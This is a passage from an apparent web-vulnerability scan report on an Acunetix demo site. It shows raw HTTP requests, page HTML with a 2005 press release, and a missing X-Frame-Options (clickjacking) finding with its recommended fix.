NlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        15. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
